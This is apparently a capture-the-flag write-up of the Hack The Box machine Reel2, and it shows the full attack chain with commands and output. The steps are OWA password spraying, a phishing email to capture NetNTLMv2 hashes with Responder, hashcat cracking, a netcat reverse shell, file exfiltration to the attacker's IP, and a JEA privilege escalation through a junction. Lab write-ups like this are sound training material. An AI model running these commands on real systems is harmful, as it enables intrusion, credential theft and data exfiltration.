introduce OS: Windows
User Blood xct 00 days, 03 hours, 08 mins, 20 seconds.
first use nmap as usaul
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 root@kali:~/hackthebox/machine/reel2 PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 443/tcp open ssl/https? 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6005/tcp open msrpc Microsoft Windows RPC 6006/tcp open msrpc Microsoft Windows RPC 6007/tcp open msrpc Microsoft Windows RPC 6008/tcp open msrpc Microsoft Windows RPC 6010/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6011/tcp open msrpc Microsoft Windows RPC 6012/tcp open msrpc Microsoft Windows RPC 6027/tcp open msrpc Microsoft Windows RPC 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1 .1 g PHP/7.2 .32 ) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Enumerating http But He Said 403-Forbidden
Enumerating HTTPS .
use gobuster to find Directories
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 root@kali:~/hackthebox/machine/reel2 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: https://10.10.10.210 [+] Threads: 50 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/10/12 22:34:11 Starting gobuster =============================================================== /public (Status: 302) /exchange (Status: 302) /Public (Status: 302) /rpc (Status: 401) /owa (Status: 301)
Go to /owa First
a login page. Try some sql injection
But nothing is work.
Create A Account On SignUp Page.
In Home Page There Are So Many Users
Gather All Users and Create A user.txt
1 2 3 sven svensson s.svensson
See All Posts In The Posts Tab, The svensson user post gave us a hint: This summer is so hot!
Create A pass.txt with this hint.
1 2 3 4 5 6 7 root@kali:~/hackthebox/machine/reel2 root@kali:~/hackthebox/machine/reel2 Summer Summer1 Summer07 Summer08 ...
With the user.txt and pass.txt, lets bruteforce the OWA login
But We Don’t bruteforce OWA login with wfuzz and hydra. we need to install a tool called SprayingToolkit.
Before Running this tool install the requirements of this tool.
Let’s run the tool
1 2 3 4 5 root@kali:~/SprayingToolkit [*] Starting spray at 2020-10-13 03:40:56 UTC [-] Authentication failed: svensson:Summer2020 (Invalid credentials) [-] Authentication failed: sven:Summer2020 (Invalid credentials) [+] Found credentials: s.svensson:Summer2020 (Invalid credentials)
Username = s.svensson
Password = Summer2020
get shell site is on another language. Let’s open it in chromium so we will understand what’s going on.
Now I understand what’s going on here it’s a mail server i think we need to do some Phising stuff.
If you don’t known about that here is an interesting article.
NetNTLMv2 hash stealing using Outlook
So what we can do now compiling a new message
1.click on New message.
2.Select all user with Control+A then click on To button on bottom. So this will send our email to each and every user .
3.Give the subject as you wish and in the body enter your htb ip like http://10.10.14.3
Before Sending this email start the responder.
Boom, After couple of minutes we get the response back.
But first we need to crack this hash using hashcat. we known this is NTLMv2 Hash
1 hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
username = k.svensson
password = kittycat1
Evil-WinRm is not work at this situation because port 5985 is not open.
So we using Linux Powershell to login.But First Install powershell for Linux
1 2 apt install gss-ntlmssp apt-get install powershell
After installation can access powershell with pwsh.
Now login with pwsh.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 root@kali:~ PowerShell 7.0.0 Copyright (c) Microsoft Corporation. All rights reserved. https://aka.ms/powershell Type 'help' to get help . A new PowerShell stable release is available: v7.0.3 Upgrade now, or check out the release page at: https://aka.ms/PowerShell-Release?tag=v7.0.3 PS /root> $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson PowerShell credential request Enter your credentials. Password for user k.svensson: ********* PS /root> Enter-PSSession $offsec_session [10.10.10.210]: P>
Now commands like dir, ls, cd, whoami won’t work.
$env:username and $env:domainname works.
1 2 [10.10.10.210]: P> $env :username k.svensson
We need to Execute powershell commands with the script block
1 2 3 4 5 6 7 8 9 10 11 12 13 14 [10.10.10.210]: P> &{ cd ../Desktop } [10.10.10.210]: P> &{ ls } Directory: C:\Users\k.svensson\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2020/7/30 13:19 2428 Sticky Notes.lnk -ar--- 2020/10/13 9:17 34 user.txt [10.10.10.210]: P> &{ type user.txt} 210ff91b4373ae60dbc352737555b4b4
get root Now, let’s change this interface to shell interface for that we need to transfer a nc.exe file and get a reverse shell.
open a simple http server.
1 2 3 root@kali:~/hackthebox/machine/reel2 nc.exe pass.txt user.txt root@kali:~/hackthebox/machine/reel2
transfer nc.exe to the system
after running that open a netcat listener.
1 2 3 [10.10.10.210]: PS> &{ iwr -uri http://10.10.14.3/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe' } [10.10.10.210]: PS> &{ cd 'C:\Windows\System32\spool\drivers\color\' } [10.10.10.210]: PS> &{ ./nc.exe 10.10.14.3 9001 -e powershell.exe}
and we get a reverse shell
1 2 3 4 5 6 7 8 9 10 11 12 root@kali:~ Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.210. Ncat: Connection from 10.10.10.210:57417. Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved. PS C:\Windows\System32\spool\drivers\color> whoami whoami htb\k.svensson
We Found nothing in our Enumeration proccess Let’s check the log if anything interesting there.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 PS C:\> dir dir Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 7/30/2020 12:15 PM ExchangeSetupLogs d----- 7/30/2020 12:02 PM inetpub d----- 8/22/2013 5:52 PM PerfLogs d-r--- 10/8/2020 3:29 PM Program Files d----- 7/30/2020 11:48 AM Program Files (x86) d-r--- 7/30/2020 1:17 PM Users d----- 9/29/2020 6:09 PM Windows d----- 7/28/2020 2:57 PM xampp
we find 000003.log file in our current user directory Let’s get on that.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 PS C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb> ls ls Directory: C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 10/8/2020 3:34 PM 2320 000003.log -a---- 7/30/2020 1:19 PM 16 CURRENT -a---- 7/30/2020 1:19 PM 0 LOCK -a---- 10/13/2020 9:22 AM 0 LOG -a---- 10/8/2020 3:34 PM 182 LOG.old -a---- 7/30/2020 1:19 PM 41 MANIFEST-000001
when we use type command to see inside 000003.log file it’s give me gibberish.
So we need to get that file in our local machine.
So we use nc.exe to transfer the file.
open a listener in your local machine to get the file content.
1 nc -nvlp 1234 > 000003.log
In the window reverse shell type this command.
1 2 3 4 5 6 7 8 9 10 11 12 13 PS C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb> cd / cd /PS C:\> cmd cmd Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\>cd "C:\Windows\System32\spool\drivers\color\" cd " C:\Windows\System32\spool\drivers\color\"C:\Windows\System32\spool\drivers\color>nc.exe 10.10.14.3 1234 < "C:\users\k.svensson\appdata\roaming\stickynotes\Local Storage/leveldb\000003.log" nc.exe 10.10.14.3 1234 < "C:\users\k.svensson\appdata\roaming\stickynotes\Local Storage/leveldb\000003.log"
Let’s check our netcat listener.
1 2 3 4 5 6 root@kali:~/hackthebox/machine/reel2 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 10.10.10.210. Ncat: Connection from 10.10.10.210:51827.
use strings command to see content in 000003.log file.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 root@kali:~/hackthebox/machine/reel2 VERSION META:app://. _app://. __storejs__test__Z META:app://. _app://. {"first" :"<p>Credentials for JEA</p><p>jea_test_account:Ab!Q@vcg^%@#1</p>" ,"back" :"rgb(255, 242, 171)" ,"title" :"rgb(255, 235, 129)" ,"wid" :"350" ,"hei" :"375" ,"deleted" :"no" ,"closed" :"yes" ,"locked" :"no" } _app://. __storejs__test__ _app://. closed {"closed" :"yes" } _app://. {"ids" :"1" }y META:app://. _app://. __storejs__test__ _app://. closed @:lK META:app://. _app://. closed {"closed" :"yes" } META:app://. _app://. __storejs__test__ _app://. closed META:app://. _app://. closed {"closed" :"yes" } META:app://. _app://. __storejs__test__ _app://. closed META:app://. _app://. __storejs__test__ META:app://. _app://. __storejs__test__ META:app://. _app://. __storejs__test__ META:app://. _app://. __storejs__test__P META:app://. _app://. __storejs__test__ META:app://. _app://. __storejs__test__] META:app://. _app://. closed {"closed" :"yes" } META:app://. _app://. __storejs__test__ _app://. closed: META:app://. _app://. __storejs__test__ META:app://. _app://. __storejs__test__ META:app://. _app://. __storejs__test__b META:app://. _app://. __storejs__test__ META:app://. _app://. __storejs__test__ META:app://. _app://. __storejs__test__ META:app://. _app://. __storejs__test__N META:app://. _app://. __storejs__test__ META:app://. _app://. __storejs__test__ META:app://. _app://. __storejs__test__ META:app://. _app://. __storejs__test__ META:app://. _app://. __storejs__test__
now We got the username and password
1 2 username = jea_test_account password = Ab!Q@vcg^%@
Privilege escalation Looking at the basic jae_test_account.psrc and .pssc the Check-File commad loads if the contents are from the “C:\ProgramData”.
So what we can do we need to create a Symlink to ProgramData directory with Administrator directory.
be sure run this command in PS
1 2 3 4 5 6 7 8 9 10 PS C:\> New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator' New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator' Directory: C:\ProgramData Mode LastWriteTime Length Name ---- ------------- ------ ---- d----l 10/13/2020 11:02 AM root
Now command will Executed successfully.
So when we login with jea_test_account account we can access Administrator directory also.
Now we need to login with jea_test_account account. So let’s open a new terminal and type pwsh.
Run the command one by one.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 root@kali:~ PowerShell 7.0.0 Copyright (c) Microsoft Corporation. All rights reserved. https://aka.ms/powershell Type 'help' to get help . A new PowerShell stable release is available: v7.0.3 Upgrade now, or check out the release page at: https://aka.ms/PowerShell-Release?tag=v7.0.3 PS /root> $username = "jea_test_account" PS /root> $password = ConvertTo-SecureString "Ab!Q@vcg^%@#1" -AsPlainText -Force PS /root> $cred = New-Object System.Management.Automation.PSCredential -ArgumentList ($username , $password ) PS /root> Enter-PSSession -Computer 10.10.10.210 -credential $cred -ConfigurationName jea_test_account -verbose -debug -Authentication Negotiate [10.10.10.210]: PS>Check-File C:\programdata\root\Desktop\root.txt 18c458e91c1f45379bc97905034c8ad8
Summary of knowledge
bruteforce the OWA login using SprayingToolkit
NetNTLMv2 hash stealing using Outlook
responder to sniff NTLMv2 Hash
hashcat crack NTLMv2 Hash
login with pwsh
Execute powershell commands with the script block
iwr download files
nc.exe to transfer the file
create a Symlink to ProgramData directory with Administrator directory then use Check-File to read root flag.
QQ: 1185151867
twitter: https://twitter.com/fdlucifer11
github: https://github.com/FDlucifer
I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…
